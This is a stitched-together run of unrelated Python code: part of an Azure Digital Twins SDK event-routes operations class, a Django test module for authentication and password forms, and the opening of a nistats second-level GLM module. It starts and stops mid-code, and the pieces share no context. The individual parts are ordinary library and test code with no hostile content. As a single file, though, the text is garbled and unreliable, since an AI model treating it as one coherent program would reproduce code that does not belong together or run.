header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('EventRouteCollection', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
error = self._deserialize(_models.ErrorResponse, response)
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, model=error)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/eventroutes'} # type: ignore
def get_by_id(
self,
id, # type: str
event_routes_get_by_id_options=None, # type: Optional["_models.EventRoutesGetByIdOptions"]
**kwargs # type: Any
):
# type: (...) -> "_models.DigitalTwinsEventRoute"
"""Retrieves an event route.
Status codes:
* 200 OK
* 404 Not Found
* EventRouteNotFound - The event route was not found.
:param id: The id for an event route. The id is unique within event routes and case sensitive.
:type id: str
:param event_routes_get_by_id_options: Parameter group.
:type event_routes_get_by_id_options: ~azure.digitaltwins.core.models.EventRoutesGetByIdOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: DigitalTwinsEventRoute, or the result of cls(response)
:rtype: ~azure.digitaltwins.core.models.DigitalTwinsEventRoute
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.DigitalTwinsEventRoute"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
if event_routes_get_by_id_options is not None:
_traceparent = event_routes_get_by_id_options.traceparent
_tracestate = event_routes_get_by_id_options.tracestate
api_version = "2020-10-31"
accept = "application/json"
# Construct URL
url = self.get_by_id.metadata['url'] # type: ignore
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error)
deserialized = self._deserialize('DigitalTwinsEventRoute', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get_by_id.metadata = {'url': '/eventroutes/{id}'} # type: ignore
def add(
self,
id, # type: str
event_route=None, # type: Optional["_models.DigitalTwinsEventRoute"]
event_routes_add_options=None, # type: Optional["_models.EventRoutesAddOptions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Adds or replaces an event route.
Status codes:
* 204 No Content
* 400 Bad Request
* EventRouteEndpointInvalid - The endpoint provided does not exist or is not active.
* EventRouteFilterInvalid - The event route filter is invalid.
* EventRouteIdInvalid - The event route id is invalid.
* LimitExceeded - The maximum number of event routes allowed has been reached.
:param id: The id for an event route. The id is unique within event routes and case sensitive.
:type id: str
:param event_route: The event route data.
:type event_route: ~azure.digitaltwins.core.models.DigitalTwinsEventRoute
:param event_routes_add_options: Parameter group.
:type event_routes_add_options: ~azure.digitaltwins.core.models.EventRoutesAddOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
if event_routes_add_options is not None:
_traceparent = event_routes_add_options.traceparent
_tracestate = event_routes_add_options.tracestate
api_version = "2020-10-31"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.add.metadata['url'] # type: ignore
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if event_route is not None:
body_content = self._serialize.body(event_route, 'DigitalTwinsEventRoute')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
add.metadata = {'url': '/eventroutes/{id}'} # type: ignore
def delete(
self,
id, # type: str
event_routes_delete_options=None, # type: Optional["_models.EventRoutesDeleteOptions"]
**kwargs # type: Any
):
# type: (...) -> None
"""Deletes an event route.
Status codes:
* 204 No Content
* 404 Not Found
* EventRouteNotFound - The event route was not found.
:param id: The id for an event route. The id is unique within event routes and case sensitive.
:type id: str
:param event_routes_delete_options: Parameter group.
:type event_routes_delete_options: ~azure.digitaltwins.core.models.EventRoutesDeleteOptions
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
_traceparent = None
_tracestate = None
if event_routes_delete_options is not None:
_traceparent = event_routes_delete_options.traceparent
_tracestate = event_routes_delete_options.tracestate
api_version = "2020-10-31"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'id': self._serialize.url("id", id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
if _traceparent is not None:
header_parameters['traceparent'] = self._serialize.header("traceparent", _traceparent, 'str')
if _tracestate is not None:
header_parameters['tracestate'] = self._serialize.header("tracestate", _tracestate, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize(_models.ErrorResponse, response)
raise HttpResponseError(response=response, model=error)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/eventroutes/{id}'} # type: ignore
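# Illustrative sketch (added for clarity, not part of the generated file):
# as the class docstring notes, this operation group is not instantiated
# directly; a service client creates it and attaches it as an attribute.
# Assuming that client exposes the group as ``client.event_routes`` (an
# assumption made only for illustration), typical calls to the methods
# defined above would look like the following. The route id, endpoint name
# and filter values are placeholders.
def _example_event_routes_usage(client):
    # ``list`` returns an ItemPaged iterator; iterating it yields the
    # individual event routes extracted from each EventRouteCollection page.
    existing_routes = [route for route in client.event_routes.list()]
    # Create (or replace) a route, read it back, then delete it.
    new_route = _models.DigitalTwinsEventRoute(
        endpoint_name="example-endpoint",
        filter="type = 'Microsoft.DigitalTwins.Twin.Create'",
    )
    client.event_routes.add("example-route-id", event_route=new_route)
    fetched = client.event_routes.get_by_id("example-route-id")
    client.event_routes.delete("example-route-id")
    return existing_routes, fetched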
|
|
from __future__ import unicode_literals
import datetime
import re
from django import forms
from django.contrib.auth.forms import (
AdminPasswordChangeForm, AuthenticationForm, PasswordChangeForm,
PasswordResetForm, ReadOnlyPasswordHashField, ReadOnlyPasswordHashWidget,
SetPasswordForm, UserChangeForm, UserCreationForm,
)
from django.contrib.auth.models import User
from django.contrib.sites.models import Site
from django.core import mail
from django.core.mail import EmailMultiAlternatives
from django.forms.fields import CharField, Field
from django.test import SimpleTestCase, TestCase, mock, override_settings
from django.utils import translation
from django.utils.encoding import force_text
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from .settings import AUTH_TEMPLATES
class TestDataMixin(object):
@classmethod
def setUpTestData(cls):
cls.u1 = User.objects.create(
password='sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161',
last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False, username='testclient',
first_name='Test', last_name='Client', email='testclient@example.com', is_staff=False, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u2 = User.objects.create(
password='sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161',
last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False, username='inactive',
first_name='Inactive', last_name='User', email='testclient2@example.com', is_staff=False, is_active=False,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u3 = User.objects.create(
password='sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161',
last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False, username='staff',
first_name='Staff', last_name='Member', email='staffmember@example.com', is_staff=True, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u4 = User.objects.create(
password='', last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False,
username='empty_password', first_name='Empty', last_name='Password', email='empty_password@example.com',
is_staff=False, is_active=True, date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u5 = User.objects.create(
password='$', last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False,
username='unmanageable_password', first_name='Unmanageable', last_name='Password',
email='unmanageable_password@example.com', is_staff=False, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
cls.u6 = User.objects.create(
password='foo$bar', last_login=datetime.datetime(2006, 12, 17, 7, 3, 31), is_superuser=False,
username='unknown_password', first_name='Unknown', last_name='Password',
email='unknown_password@example.com', is_staff=False, is_active=True,
date_joined=datetime.datetime(2006, 12, 17, 7, 3, 31)
)
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class UserCreationFormTest(TestDataMixin, TestCase):
def test_user_already_exists(self):
data = {
'username': 'testclient',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["username"].errors,
[force_text(User._meta.get_field('username').error_messages['unique'])])
def test_invalid_data(self):
data = {
'username': 'jsmith!',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [force_text(validator.message)])
def test_password_verification(self):
# The verification password is incorrect.
data = {
'username': 'jsmith',
'password1': 'test123',
'password2': 'test',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form["password2"].errors,
[force_text(form.error_messages['password_mismatch'])])
def test_both_passwords(self):
# One (or both) passwords weren't given
data = {'username': 'jsmith'}
form = UserCreationForm(data)
required_error = [force_text(Field.default_error_messages['required'])]
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, required_error)
data['password2'] = 'test123'
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['password1'].errors, required_error)
self.assertEqual(form['password2'].errors, [])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
data = {
'username': 'jsmith@example.com',
'password1': 'test123',
'password2': 'test123',
}
form = UserCreationForm(data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
u = form.save()
self.assertEqual(password_changed.call_count, 1)
self.assertEqual(repr(u), '<User: jsmith@example.com>')
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
data = {
'username': 'testclient',
'password1': 'testclient',
'password2': 'testclient',
}
form = UserCreationForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form['password2'].errors), 2)
self.assertIn('The password is too similar to the username.', form['password2'].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form['password2'].errors
)
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class AuthenticationFormTest(TestDataMixin, TestCase):
def test_invalid_username(self):
# The user submits an invalid username.
data = {
'username': 'jsmith_does_not_exist',
'password': 'test123',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[force_text(form.error_messages['invalid_login'] % {
'username': User._meta.get_field('username').verbose_name
})])
def test_inactive_user(self):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[force_text(form.error_messages['inactive'])])
def test_inactive_user_i18n(self):
with self.settings(USE_I18N=True), translation.override('pt-br', deactivate=True):
# The user is inactive.
data = {
'username': 'inactive',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(),
[force_text(form.error_messages['inactive'])])
def test_custom_login_allowed_policy(self):
# The user is inactive, but our custom form policy allows them to log in.
data = {
'username': 'inactive',
'password': 'password',
}
class AuthenticationFormWithInactiveUsersOkay(AuthenticationForm):
def confirm_login_allowed(self, user):
pass
form = AuthenticationFormWithInactiveUsersOkay(None, data)
self.assertTrue(form.is_valid())
# If we want to disallow some logins according to custom logic,
# we should raise a django.forms.ValidationError in the form.
class PickyAuthenticationForm(AuthenticationForm):
def confirm_login_allowed(self, user):
if user.username == "inactive":
raise forms.ValidationError("This user is disallowed.")
raise forms.ValidationError("Sorry, nobody's allowed in.")
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ['This user is disallowed.'])
data = {
'username': 'testclient',
'password': 'password',
}
form = PickyAuthenticationForm(None, data)
self.assertFalse(form.is_valid())
self.assertEqual(form.non_field_errors(), ["Sorry, nobody's allowed in."])
def test_success(self):
# The success case
data = {
'username': 'testclient',
'password': 'password',
}
form = AuthenticationForm(None, data)
self.assertTrue(form.is_valid())
self.assertEqual(form.non_field_errors(), [])
def test_username_field_label(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label="Name", max_length=75)
form = CustomAuthenticationForm()
self.assertEqual(form['username'].label, "Name")
def test_username_field_label_not_set(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField()
form = CustomAuthenticationForm()
username_field = User._meta.get_field(User.USERNAME_FIELD)
self.assertEqual(form.fields['username'].label, capfirst(username_field.verbose_name))
def test_username_field_label_empty_string(self):
class CustomAuthenticationForm(AuthenticationForm):
username = CharField(label='')
form = CustomAuthenticationForm()
self.assertEqual(form.fields['username'].label, "")
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class SetPasswordFormTest(TestDataMixin, TestCase):
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[force_text(form.error_messages['password_mismatch'])])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = SetPasswordForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
@override_settings(AUTH_PASSWORD_VALIDATORS=[
{'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator'},
{'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', 'OPTIONS': {
'min_length': 12,
}},
])
def test_validates_password(self):
user = User.objects.get(username='testclient')
data = {
'new_password1': 'testclient',
'new_password2': 'testclient',
}
form = SetPasswordForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(len(form["new_password2"].errors), 2)
self.assertIn('The password is too similar to the username.', form["new_password2"].errors)
self.assertIn(
'This password is too short. It must contain at least 12 characters.',
form["new_password2"].errors
)
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class PasswordChangeFormTest(TestDataMixin, TestCase):
def test_incorrect_password(self):
user = User.objects.get(username='testclient')
data = {
'old_password': 'test',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["old_password"].errors,
[force_text(form.error_messages['password_incorrect'])])
def test_password_verification(self):
# The two new passwords do not match.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc',
}
form = PasswordChangeForm(user, data)
self.assertFalse(form.is_valid())
self.assertEqual(form["new_password2"].errors,
[force_text(form.error_messages['password_mismatch'])])
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
# The success case.
user = User.objects.get(username='testclient')
data = {
'old_password': 'password',
'new_password1': 'abc123',
'new_password2': 'abc123',
}
form = PasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
def test_field_order(self):
# Regression test - check the order of fields:
user = User.objects.get(username='testclient')
self.assertEqual(list(PasswordChangeForm(user, {}).fields),
['old_password', 'new_password1', 'new_password2'])
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class UserChangeFormTest(TestDataMixin, TestCase):
def test_username_validity(self):
user = User.objects.get(username='testclient')
data = {'username': 'not valid'}
form = UserChangeForm(data, instance=user)
self.assertFalse(form.is_valid())
validator = next(v for v in User._meta.get_field('username').validators if v.code == 'invalid')
self.assertEqual(form["username"].errors, [force_text(validator.message)])
def test_bug_14242(self):
        # A regression test, introduced by adding an optimization for the
# UserChangeForm.
class MyUserForm(UserChangeForm):
def __init__(self, *args, **kwargs):
super(MyUserForm, self).__init__(*args, **kwargs)
self.fields['groups'].help_text = 'These groups give users different permissions'
class Meta(UserChangeForm.Meta):
fields = ('groups',)
# Just check we can create it
MyUserForm({})
    def test_unusable_password(self):
user = User.objects.get(username='empty_password')
user.set_unusable_password()
user.save()
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_empty_password(self):
user = User.objects.get(username='empty_password')
form = UserChangeForm(instance=user)
self.assertIn(_("No password set."), form.as_table())
def test_bug_17944_unmanageable_password(self):
user = User.objects.get(username='unmanageable_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."),
form.as_table())
def test_bug_17944_unknown_password_algorithm(self):
user = User.objects.get(username='unknown_password')
form = UserChangeForm(instance=user)
self.assertIn(_("Invalid password format or unknown hashing algorithm."),
form.as_table())
def test_bug_19133(self):
"The change form does not return the password value"
# Use the form to construct the POST data
user = User.objects.get(username='testclient')
form_for_data = UserChangeForm(instance=user)
post_data = form_for_data.initial
# The password field should be readonly, so anything
# posted here should be ignored; the form will be
# valid, and give back the 'initial' value for the
# password field.
post_data['password'] = 'new password'
form = UserChangeForm(instance=user, data=post_data)
self.assertTrue(form.is_valid())
self.assertEqual(form.cleaned_data['password'], 'sha1$6efc0$f93efe9fd7542f25a7be94871ea45aa95de57161')
def test_bug_19349_bound_password_field(self):
user = User.objects.get(username='testclient')
form = UserChangeForm(data={}, instance=user)
# When rendering the bound password field,
# ReadOnlyPasswordHashWidget needs the initial
# value to render correctly
self.assertEqual(form.initial['password'], form['password'].value())
@override_settings(
PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'],
TEMPLATES=AUTH_TEMPLATES,
USE_TZ=False,
)
class PasswordResetFormTest(TestDataMixin, TestCase):
@classmethod
def setUpClass(cls):
super(PasswordResetFormTest, cls).setUpClass()
# This cleanup is necessary because contrib.sites cache
# makes tests interfere with each other, see #11505
Site.objects.clear_cache()
def create_dummy_user(self):
"""
Create a user and return a tuple (user_object, username, email).
"""
username = 'jsmith'
email = 'jsmith@example.com'
user = User.objects.create_user(username, email, 'test123')
return (user, username, email)
def test_invalid_email(self):
data = {'email': 'not valid'}
form = PasswordResetForm(data)
self.assertFalse(form.is_valid())
self.assertEqual(form['email'].errors, [_('Enter a valid email address.')])
def test_nonexistent_email(self):
"""
Test nonexistent email address. This should not fail because it would
expose information about registered users.
"""
data = {'email': 'foo@bar.com'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
self.assertEqual(len(mail.outbox), 0)
def test_cleaned_data(self):
(user, username, email) = self.create_dummy_user()
data = {'email': email}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
form.save(domain_override='example.com')
self.assertEqual(form.cleaned_data['email'], email)
self.assertEqual(len(mail.outbox), 1)
def test_custom_email_subject(self):
data = {'email': 'testclient@example.com'}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Custom password reset on example.com')
def test_custom_email_constructor(self):
data = {'email': 'testclient@example.com'}
class CustomEmailPasswordResetForm(PasswordResetForm):
def send_mail(self, subject_template_name, email_template_name,
context, from_email, to_email,
html_email_template_name=None):
EmailMultiAlternatives(
"Forgot your password?",
"Sorry to hear you forgot your password.",
None, [to_email],
['site_monitor@example.com'],
headers={'Reply-To': 'webmaster@example.com'},
alternatives=[("Really sorry to hear you forgot your password.",
"text/html")]).send()
form = CustomEmailPasswordResetForm(data)
self.assertTrue(form.is_valid())
# Since we're not providing a request object, we must provide a
# domain_override to prevent the save operation from failing in the
# potential case where contrib.sites is not installed. Refs #16412.
form.save(domain_override='example.com')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(mail.outbox[0].subject, 'Forgot your password?')
self.assertEqual(mail.outbox[0].bcc, ['site_monitor@example.com'])
self.assertEqual(mail.outbox[0].content_subtype, "plain")
def test_preserve_username_case(self):
"""
Preserve the case of the user name (before the @ in the email address)
when creating a user (#5605).
"""
user = User.objects.create_user('forms_test2', 'tesT@EXAMple.com', 'test')
self.assertEqual(user.email, 'tesT@example.com')
user = User.objects.create_user('forms_test3', 'tesT', 'test')
self.assertEqual(user.email, 'tesT')
def test_inactive_user(self):
"""
Test that inactive user cannot receive password reset email.
"""
(user, username, email) = self.create_dummy_user()
user.is_active = False
user.save()
form = PasswordResetForm({'email': email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_unusable_password(self):
user = User.objects.create_user('testuser', 'test@example.com', 'test')
data = {"email": "test@example.com"}
form = PasswordResetForm(data)
self.assertTrue(form.is_valid())
user.set_unusable_password()
user.save()
form = PasswordResetForm(data)
# The form itself is valid, but no email is sent
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 0)
def test_save_plaintext_email(self):
"""
Test the PasswordResetForm.save() method with no html_email_template_name
parameter passed in.
Test to ensure original behavior is unchanged after the parameter was added.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save()
self.assertEqual(len(mail.outbox), 1)
message = mail.outbox[0].message()
self.assertFalse(message.is_multipart())
self.assertEqual(message.get_content_type(), 'text/plain')
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(mail.outbox[0].alternatives), 0)
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w+/-]', message.get_payload()))
def test_save_html_email_template_name(self):
"""
        Test the PasswordResetForm.save() method with html_email_template_name
parameter specified.
Test to ensure that a multipart email is sent with both text/plain
and text/html parts.
"""
(user, username, email) = self.create_dummy_user()
form = PasswordResetForm({"email": email})
self.assertTrue(form.is_valid())
form.save(html_email_template_name='registration/html_password_reset_email.html')
self.assertEqual(len(mail.outbox), 1)
self.assertEqual(len(mail.outbox[0].alternatives), 1)
message = mail.outbox[0].message()
self.assertEqual(message.get('subject'), 'Custom password reset on example.com')
self.assertEqual(len(message.get_payload()), 2)
self.assertTrue(message.is_multipart())
self.assertEqual(message.get_payload(0).get_content_type(), 'text/plain')
self.assertEqual(message.get_payload(1).get_content_type(), 'text/html')
self.assertEqual(message.get_all('to'), [email])
self.assertTrue(re.match(r'^http://example.com/reset/[\w/-]+', message.get_payload(0).get_payload()))
self.assertTrue(
re.match(r'^<html><a href="http://example.com/reset/[\w/-]+/">Link</a></html>$',
message.get_payload(1).get_payload())
)
class ReadOnlyPasswordHashTest(SimpleTestCase):
def test_bug_19349_render_with_none_value(self):
# Rendering the widget with value set to None
# mustn't raise an exception.
widget = ReadOnlyPasswordHashWidget()
html = widget.render(name='password', value=None, attrs={})
self.assertIn(_("No password set."), html)
def test_readonly_field_has_changed(self):
field = ReadOnlyPasswordHashField()
self.assertFalse(field.has_changed('aaa', 'bbb'))
@override_settings(USE_TZ=False, PASSWORD_HASHERS=['django.contrib.auth.hashers.SHA1PasswordHasher'])
class AdminPasswordChangeFormTest(TestDataMixin, TestCase):
@mock.patch('django.contrib.auth.password_validation.password_changed')
def test_success(self, password_changed):
user = User.objects.get(username='testclient')
data = {
'password1': 'test123',
'password2': 'test123',
}
form = AdminPasswordChangeForm(user, data)
self.assertTrue(form.is_valid())
form.save(commit=False)
self.assertEqual(password_changed.call_count, 0)
form.save()
self.assertEqual(password_changed.call_count, 1)
|
|
"""
This module presents an interface to use the GLM implemented in
nistats.regression.
It provides facilities to run a second-level analysis on lists of
first-level contrasts or directly on fitted first-level models.
Author: Martin Perez-Guevara, 2016
"""
import sys
import time
from warnings import warn
import pandas as pd
import numpy as np
from nibabel import Nifti1Image
from nilearn._utils.niimg_conversions import check_niimg
from nilearn._utils import CacheMixin
from nilearn.input_data import NiftiMasker
from nilearn.image import mean_img
from patsy import DesignInfo
from sklearn.base import BaseEstimator, TransformerMixin, clone
from sklearn.externals.joblib import Memory
from .first_level_model import FirstLevelModel
from .first_level_model import run_glm
from .regression import SimpleRegressionResults
from .contrasts import compute_contrast
from .utils import _basestring
from .design_matrix import make_second_level_design_matrix
from nistats._utils.helpers import replace_parameters
def _infer_effect_maps(second_level_input, contrast_def):
"""Deals with the different possibilities of second_level_input"""
# Build the design matrix X and list of imgs Y for GLM fit
if isinstance(second_level_input, pd.DataFrame):
# If a Dataframe was given, we expect contrast_def to be in map_name
def _is_contrast_def(x):
return x['map_name'] == contrast_def
is_con = second_level_input.apply(_is_contrast_def, axis=1)
effect_maps = second_level_input[is_con]['effects_map_path'].tolist()
elif isinstance(second_level_input[0], FirstLevelModel):
# Get the first level model maps
effect_maps = []
for model in second_level_input:
effect_map = model.compute_contrast(contrast_def,
output_type='effect_size')
effect_maps.append(effect_map)
else:
effect_maps = second_level_input
# check niimgs
for niimg in effect_maps:
check_niimg(niimg, ensure_ndim=3)
return effect_maps
class SecondLevelModel(BaseEstimator, TransformerMixin, CacheMixin):
""" Implementation of the General Linear Model for multiple subject
fMRI data
Parameters
----------
mask_img: Niimg-like, NiftiMasker or MultiNiftiMasker object, optional,
Mask to be used on data. If an instance of masker is passed,
then its mask will be used. If no mask is given,
it will be computed automatically by a MultiNiftiMasker with default
parameters. Automatic mask computation assumes first level imgs have
already been masked.
smoothing_fwhm: float, optional
If smoothing_fwhm is not None, it gives the size in millimeters of the
spatial smoothing to apply to the signal.
memory: string, optional
Path to the directory used to cache the masking process and the glm
fit. By default, no caching is done. Creates instance of joblib.Memory.
memory_level: integer, optional
Rough estimator of the amount of memory used by caching. Higher value
means more memory for caching.
verbose : integer, optional
Indicate the level of verbosity. By default, nothing is printed.
If 0 prints nothing. If 1 prints final computation time.
If 2 prints masker computation details.
n_jobs : integer, optional
The number of CPUs to use to do the computation. -1 means
'all CPUs', -2 'all CPUs but one', and so on.
minimize_memory : boolean, optional
Gets rid of some variables on the model fit results that are not
necessary for contrast computation and would only be useful for
further inspection of model details. This has an important impact
on memory consumption. True by default.
"""
@replace_parameters({'mask': 'mask_img'}, end_version='next')
